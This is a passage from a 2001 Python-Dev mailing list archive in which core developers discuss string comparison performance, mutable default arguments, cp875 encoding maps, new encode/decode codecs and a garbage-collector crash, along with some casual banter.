<200105151527.KAA28734@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > PEP 207 is quite explicit that == and != are not to be assumed each > other's complement. It is silent on the x==x issue but the PEP > mentions IEEE 754 so I agree that this also shouldn't be cut short. It's explicit about x==x too: (Note: Python currently assumes that x==x is always true and x!=x is never true; this should not be assumed.) That's from the end of point #4, under "Proposed Resolutions". I agreed then, and still do . From martin@loewis.home.cs.tu-berlin.de Wed May 16 08:28:45 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:28:45 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT)) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> > Sounds like we ought to do a search-and-destroy on type comparisons, > replacing with isinstance() where possible. At least in my applications, this is unfortunately not possible: I want a test for byte-string-or-unicode-string. This could be done with two isinstance calls, but that is certainly less efficient. Marc-Andre once proposed a type representing the immediate supertype of both byte strings and unicode strings; let's call it abstract string. Then I could write isinstance(e, types.AbstractString). Regards, Martin From martin@loewis.home.cs.tu-berlin.de Wed May 16 08:24:56 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:24:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org> Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de> > GvR> I'm curious where the frequent comparisons of types come > GvR> from. > > Not to mention the several hundred comparisons to None. This is harder to analyse; I set a gdb breakpoint on the place where RichCompare gets PyType_Type, then tried to see what it does, then ignoring the breakpoint a few times. This is what I've found; I may miss important cases. In PyXML, the expression type(e) in [types.StringType, types.UnicodeType] is frequently computed. This is a sequence_contains, which in turn does two Py_EQ tests. In addition, compile.c:com_add has t = Py_BuildValue("(OO)", v, v->ob_type) PyDict_GetItem(dict, t) Again, the dictionary lookup performs Py_EQ on the tuples, which does Py_EQ on the elements. This also accounts for the RichCompare calls which receive None: v may be None, here, so t is (None, type(None)). In IDLE, the situation is similar. com_add produces many compares with types. In addition, sre.compile has type(s) in sre_compile.STRING_TYPES which is the same test as the PyXML one. Finally, there is a type-in-typetuple test inside Tkinter._cnfmerge. Regards, Martin From i_sofer@yahoo.com Wed May 16 08:53:25 2001 From: i_sofer@yahoo.com (Idan Sofer) Date: 16 May 2001 10:53:25 +0300 Subject: [Python-Dev] Bug report: empty dictionary as default class argument Message-ID: <200105160756.KAA29616@alpha.netvision.net.il> --=-uNM1Q6eCX9JH/wGWUYU9 Content-Type: text/plain Hello. I have found a rather annoying bug in Python, present in both Python 1.5 and Python 2.0. If a class has an argument with a default of an empty dictionary, then all instances of the same class will point to the same dictionary, unless the dictionary is explictly defined by the constructor. I attach a piece of code that demostrates the problem --=-uNM1Q6eCX9JH/wGWUYU9 Content-Type: text/x-python Content-Disposition: attachment; filename=test.py Content-Transfer-Encoding: 7bit """ Bug description: A class is defined. in the __init__ method, we define an options "attribs" argument, which defaults to {}. We create two instances of class foo, each of them without argument. we then modify the attribs attribute in one of them. in a suprising manner, the change if reflected in BOTH instances, where it should only appear in the first one. Workaround: explictly define an empty dictionary as the argument, or define the empty dictionary inside the method body. """ class foo: def __init__(self,attribs={}): self.attribs=attribs; return None; print ""; print "Defining Two instances of class foo:"; print "a=foo()" print "b=foo()" a=foo(); b=foo(); print ""; print "The 'attribs' attribute of both looks like this:"; print "a.attribs = %s" % a.attribs print "b.attribs = %s" % b.attribs print "" print "Now we modify 'attribs' in a:" print 'a.attribs["bug"]= "exists"'; a.attribs["bug"]= "exists"; print "" print "Now, things should now look like this:" print "a.attribs = %s" % a.attribs print "b.attribs = %s" % "{}"; print "" print "However, things look like this:" print "a.attribs = %s" % a.attribs print "b.attribs = %s" % b.attribs --=-uNM1Q6eCX9JH/wGWUYU9-- From martin@loewis.home.cs.tu-berlin.de Wed May 16 09:02:01 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 10:02:01 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> > Since that's the exact opposite of what I want to do, it's at least > interesting . I'll put a patch on SF soon which does what you want to do, i.e. tries tp_compare as the first thing if tp_richcompare is not there. Even with this patch, your code is faster if strings have a richcompare. Without richcompare, I get 0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730 With it, I get 0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 Given that stock CVS python is in the 0.78 range, the different is neglectable, though. Regards, Martin From larsga@garshol.priv.no Wed May 16 09:19:10 2001 From: larsga@garshol.priv.no (Lars Marius Garshol) Date: 16 May 2001 10:19:10 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il> References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: * Idan Sofer | | If a class has an argument with a default of an empty dictionary, | then all instances of the same class will point to the same | dictionary, unless the dictionary is explictly defined by the | constructor. This is part of the language semantics, and so not a bug. The default values of optional arguments are evaluated when the function/method is compiled. You may consider the semantics ill-advised, but it is intentional. | class foo: | | def __init__(self,attribs={}): | self.attribs=attribs; | return None; I usually write this as: class Foo: def __init__(self, attribs = None): self.attribs = attribs or {} --Lars M. From fredrik@pythonware.com Wed May 16 09:18:44 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Wed, 16 May 2001 10:18:44 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff> Idan Sofer wrote: > > I have found a rather annoying bug in Python, present in both Python 1.5 > and Python 2.0. > > If a class has an argument with a default of an empty dictionary, then > all instances of the same class will point to the same dictionary, > unless the dictionary is explictly defined by the constructor. maybe you should check the documentation (or the FAQ) before submitting bugs? http://www.python.org/doc/current/ref/function.html Default parameter values are evaluated when the function definition is executed. This means that the expression is evaluated once, when the function is defined, and that that same ``pre- computed'' value is used for each call. This is especially important to understand when a default parameter is a mutable object, such as a list or a dictionary: if the function modifies the object (e.g. by appending an item to a list), the default value is in effect modified. Cheers /F PS. when you do report real bugs, please use the bug tracker: http://sourceforge.net/tracker/?group_id=5470&atid=105470 "is this a bug" questions should be sent to comp.lang.python From tim.one@home.com Wed May 16 09:41:47 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 04:41:47 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: [Martin] > Producing numbers is easy :-) If only making sense of them were too <0.6 wink>. > I've instrumented my version where string implements richcmp, and > special-cases everything I can think of. 1. String objects are also equal despite being different objects, if their ob_sinterned pointers are equal and non-NULL. So if you're looking for every trick in & out of the book, that's another one. 2. But the real goal is to add only those special cases that in combination yield the largest net win, and that's much harder to determine (since there are no typical apps, and it's very hard to quantify the tradeoffs here in a credible x-platform x-app way). > Counting is done for running the test suite. With this, I get > > Calls to string_richcompare: 2378660 > Calls with different types: 33992 (ie. one is not a string) > Calls with identical strings: 120517 > Calls where lens decide !EQ: 1775716 > ---------------------------- > Calls richcmp -> oldcomp: 448435 > Total calls to oldcomp: 1225643 > Calls oldcomp -> memcmp: 860174 > > So 5% of the calls are with identical strings, for which I can > immediately decide the outcome. But also at the cost of doing a fruitless compare and branch in 95% of calls. There isn't enough data to guess whether this is a net win or a net loss (compared to leaving this special case out). Note that if the "identical string pointers" special case is a net win, it would be effective inside oldcomp instead (i.e., you don't need a richcompare slot to exploit it); indeed, it may be more effective there, since there are some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp doesn't check for pointer equality now (but PyObject_Compare does, so there didn't *used* to be any point to it in oldcmp). Any idea where those 800,000 virgin calls to oldcomp are coming from? That's a lot. > 75% can be decided in terms of the string lengths, which leaves ca. 19% > for cases where lexicographical comparison is needed. So about 1 in 5 times there's also the additional (wrt just calling oldcmp all the time) overhead of a second function call (i.e., the call to oldcmp made by richcmp). > In those cases, the first byte decides in 30%. If I remove the test > for "len decides !EQ", I get > > #riches: 2358322 > #riches_ni: 34108 > #idents_decide: 102050 > #lens_decide: 0 > -------------------------------------- > rest(computed): 2222164 > #comps: 2949421 > #memcmps: 917776 > > So still, ca. 30% can be decided by first byte. Sorry, I couldn't follow this part, except noting that 917776 is about 30% of 2949421, in which case I would have expected you to say that 70% can be decided by first byte. > It still appears that the total number of calls to memcmp is higher > when the length is not taken into consideration. Since 917776 is larger than the earlier 860174, isn't that plain? BTW, some compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of course assuming it *isn't* is also a x-platform trap. > To verify this claim, I've counted the cases where the length > decides the outcome, but looking at the first byte also had: > > lens_decide: 1784897 > lens_decide_firstbyte_wouldhave:1671148 > > So in 6% of the cases, checking the length alone gives a decision > which looking at the first byte doesn't; plus it saves a function > call. OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net* effect is muddy at best. > To support the thesis that Py_EQ is the common case for strings, I > counted the various operations: > > pyEQ:2271593 > pyLE:9234 > pyGE:0 > pyNE:20470 > pyLT:22765 > pyGT:578 This clearly wasn't doing much sorting of strings (or of tuples containing strings, etc) -- .sort() never uses pyEQ (it only uses pyLT). > Now, that might be flawed since comparing strings for equal is > extremely frequent in the testsuite. To give more credibility to the > data, I also ran setup.py with my instrumented ./python: In the absence of non-trivial use of sorting or the bisect module or one of the search tree modules out there, it's easy to buy that PyEQ is most common for strings. What's not clear is that adding a rich comparison slot actually helps overall (as compared to continuing to let string_compare() handle it, and if the pointer equality test actually saves more than it costs, adding it there instead). It's clearer that this is going to hurt sorting (& bisect etc), by adding yet another layer of function call to get Py_LT resolved (as for dict compares too, the string richcmp can't do anything to speed up Py_LT that string oldcmp can't do just as efficiently -- indeed, that's the great advantage oldcmp's "compare first character" test had: that *can* decide Py_LT in one byte much of the time (but length comparison cannot)). Note too earlier mail about how adding a richcmp slot to strings will suddenly slow cmp(string1, string2) (which is the usual way to program a search tree, because cmp() *used* to call a string comparison routine only once; but after adding a richcmp slot, each cmp(string1, string2) will call the richcmp slot from 1 thru 3 times (data-dependent)). > ... > That shows that optimizing for Py_NE is not worth it. With these data, > I'll upload a patch to SF. Which is here: http://sourceforge.net/tracker/index.php?func=detail&aid=424335& group_id=5470&atid=305470 Heh: let's grab all the ugly URLs off of SourceForge, stick them in a giant list, and sort them. Can't think of a more typical app than that . Thanks for the work, Martin! From tim.one@home.com Wed May 16 09:51:17 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 04:51:17 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: [Barry A. Warsaw] > ... > from types import StringType > import time > r = range(1000000) > > def one(r=r): > x = 'hello' > t0 = time.time() > for i in r: Random clue: when you're too lazy to try to subtact out loop overhead (not a knock, I am too), you may have better luck with r = [1] * 1000000 than r = range(1000000) The reason is that the former way gets to keep incref'ing and decref'ing a single object (as it's repeatedly bound to "i" across iterations), instead of slobbering all over memory inc'ing and dec'ing a million distinct objects. there's-as-an-art-to-doing-nothing-quickly-ly y'rs - tim From tim.one@home.com Wed May 16 09:56:56 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 04:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> Message-ID: [poor Tim] > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ [Greg Ewing] > What Pythonistas wear on their feet? [Eric S. Raymond] > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked what a lon was. But not as surprised that I didn't try to blame this on a Outlook 2000 bug. > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) Too much work anyway. They can have mine: 703 758 8258. but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs - tim From esr@thyrsus.com Wed May 16 10:17:09 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 16 May 2001 05:17:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400 References: <20010515222738.A9996@thyrsus.com> Message-ID: <20010516051709.C11602@thyrsus.com> Tim Peters : > [poor Tim] > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > [Greg Ewing] > > What Pythonistas wear on their feet? > > [Eric S. Raymond] > > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. > > Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked > what a lon was. But not as surprised that I didn't try to blame this on a > Outlook 2000 bug. > > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > > phone numbers. Pthfthfthpht...) > > Too much work anyway. They can have mine: 703 758 8258. Hmmm...now, which one of them should I try to talk into a snakeskin bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin bikini most rapidly afterwards. Then I'll give her your number -- that is, if I don't get too, er, distracted. seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours, -- Eric S. Raymond Every Communist must grasp the truth, 'Political power grows out of the barrel of a gun.' -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment. From mal@lemburg.com Wed May 16 10:29:49 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:29:49 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B02488D.415BA95F@lemburg.com> Tim Peters wrote: > > [MAL] > > Round-tripping is obviously very important if you use Unicode > > as basis for working on text. > > Since I use 7-bit ASCII exclusively, I've been using > > encode = decode = lambda x: x > > I haven't proved that's round-trippable, but haven't bumped into an exception > yet. For character map codecs the complete range(256) of possible input characters should pass the round-trip test, that is encoded text -> Unicode -> encoded text should result in the identiy mapping for all c in map(chr,range(256)). > > I don't know about the reasoning behind making cp875 fail the > > round-trip -- Unicode certainly provides means to make mappings > > round-trip safe (e.g. by reverting to the private Unicode > > char. point areas). > > Then I ignorantly but confidently (indeed, with the cheery confidence only > the truly ignorant can truly enjoy!) vote for your approach that maps the > non-round-trippable cp875 code points to None. Better safe than sorry, by > default. Else 6 of the 7 ambiguous chars will be silent surprises by > default. I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of: def make_encoding_map(decoding_map): """ Creates an encoding map from a decoding map. If a target mapping in the decoding map occurrs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \u001a. """ m = {} for k,v in decoding_map.items(): if not m.has_key(v): m[v] = k else: m[v] = None return m Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?! -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 16 10:32:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:32:36 +0200 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <3B024934.58232325@lemburg.com> "Martin v. Loewis" wrote: > > > Sounds like we ought to do a search-and-destroy on type comparisons, > > replacing with isinstance() where possible. > > At least in my applications, this is unfortunately not possible: I > want a test for byte-string-or-unicode-string. This could be done with > two isinstance calls, but that is certainly less efficient. > > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 16 10:34:40 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Wed May 16 11:53:16 2001 From: mwh@python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! This is a bit unfriendly though: >>> "bobbins".encode("gzip") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.gzip" failed to register I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an excercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "

%s

"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal@lemburg.com Wed May 16 12:06:14 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! > > urlencode would be nice. Maybe re.escape, too. html entities? > That's probably a bigger can of worms, but > > print "

%s

"%text.encode("html") > > seems delightfully simpleminded. Right. That's the idea... volunteers are welcome :-) There are lots of those little "escape this, encode that" tasks which could benefit from the codec machinery. The ones you mention would certainly be good candidates. pickle and marshal would also be a good to have wrapped as codecs. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Wed May 16 12:19:15 2001 From: mwh@python.net (Michael Hudson) Date: 16 May 2001 12:19:15 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > > This is a bit unfriendly though: > > > > >>> "bobbins".encode("gzip") > > Traceback (most recent call last): > > File "", line 1, in ? > > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > > raise SystemError,\ > > SystemError: module "encodings.gzip" failed to register > > > > I thought SystemErrors shouldn't ever happen (isn't it what gets > > raised for an illegal opcode, for example?). > > This is due to the zlib module not being installed. No it's not, actually. I *thought* I was getting the error message because the zlib encoding doesn't alias itself to gzip (whether it should or not is another question). But in fact if you specify a bogus encoding you get a nice error message: >>> "bobbins".encode("nonesuch") Traceback (most recent call last): File "", line 1, in ? LookupError: unknown encoding but: >>> "bobbins".encode("sys") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.sys" failed to register I have to admit I don't really know what's going on here, but the error is just confusing. > The reason for the search function in encodings/__init__.py raising > a SystemError is that it did find a module named gzip, but this > module does not export the needed registration API getregentry(). Yep. > Perhaps it should just raise a LookupError instead, though... Might be easiest. > > urlencode would be nice. Maybe re.escape, too. html entities? > > That's probably a bigger can of worms, but > > > > print "

%s

"%text.encode("html") > > > > seems delightfully simpleminded. > > Right. That's the idea... volunteers are welcome :-) Maybe this evening. > There are lots of those little "escape this, encode that" tasks > which could benefit from the codec machinery. The ones you > mention would certainly be good candidates. pickle and marshal > would also be a good to have wrapped as codecs. Ooh yes, hadn't thought of them. 'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs M. -- There's an aura of unholy black magic about CLISP. It works, but I have no idea how it does it. I suspect there's a goat involved somewhere. -- Johann Hibschman, comp.lang.scheme From aahz@rahul.net Wed May 16 14:16:18 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 16 May 2001 06:16:18 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net> Eric S. Raymond wrote: > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) That's okay, I have their e-mail addresses. Wanna bet on which of us gets a response first? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From barry@digicool.com Wed May 16 14:42:15 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 16 May 2001 09:42:15 -0400 Subject: [Python-Dev] Comparison speed References: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: <15106.33719.14403.13051@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Random clue: when you're too lazy to try to subtact out loop TP> overhead (not a knock, I am too), you may have better luck TP> with TP> r = [1] * 1000000 TP> than TP> r = range(1000000) Ah, good point! From guido@digicool.com Wed May 16 16:01:40 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:01:40 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com> > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). This will probably be doable in 2.2. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 16 16:24:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:24:55 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400." References: Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. Unclear what you're asking. The language doesn't require any particular semantics for sequence comparisons, but the language of course includes the tuple and list squence types, and it describes (albeing lacking some rigorous detail) what comparisons for those do. If there are specific lacks of detail, it probably helps to think about filling those in. > For a more vanilla example, I removed the EQ/NE "lengths differ?" > tuple richcmp early-exit test because I never found code that made > it trigger. (but tons of code that gets there without triggering). > But this has semantic implications too: an implementation without > the early exit may call user-defined comparison routines that raise > exceptions when comparing tuples of different lengths now. Do you > care? (I don't.) I don't care about exceptions either in this case; the shortcut seems fair game. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Wed May 16 15:28:04 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 09:28:04 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B025F26.A625DE02@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: <15106.36468.62292.611515@beluga.mojam.com> mal> pickle and marshal would also be a good to have wrapped as codecs. Why? They operate on much more than strings. -- Skip Montanaro (skip@pobox.com) (847)971-7098 From fredrik@effbot.org Wed May 16 16:07:18 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 16 May 2001 17:07:18 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid> skip wrote: > mal> pickle and marshal would also be a good to have wrapped as codecs. > > Why? They operate on much more than strings. hypergeneralization, of course. more candidates: "10".decode("int") "10.0".decode("float") "[1, 2, 3]".decode("list") "readme.txt".decode("file") "SyntaxError".decode("raise") (etc) Cheers /F From nas@python.ca Wed May 16 17:19:42 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 16 May 2001 09:19:42 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200 References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> Message-ID: <20010516091942.A16455@glacier.fnational.com> Martin v. Loewis wrote: > In any case, I think you need to analyse this in a debugger. #7 0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0) at ../Objects/tupleobject.c:366 366 err = visit(x, arg); (gdb) p *o $11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}} (gdb) p *o->ob_item[0] $12 = {ob_refcnt = 2, ob_type = 0x0} In other words the GC is finding a tuple object that contains an element with a funny looking address (data segment?) and an op_type of NULL. The collector has started running from here: #10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467 #11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507 #12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149 #13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249 #14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495 #15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451 #16 0x400194ac in pygobject_register_class (dict=0x81851fc, class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 , ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202 #17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844 #18 0x40257004 in init_gtk () at gtkmodule.c:98 I don't have time to dig deeper into this right now but perhaps this will help someone. Neil From mal@lemburg.com Wed May 16 17:24:57 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 18:24:57 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> Message-ID: <3B02A9D9.113836D6@lemburg.com> Fredrik Lundh 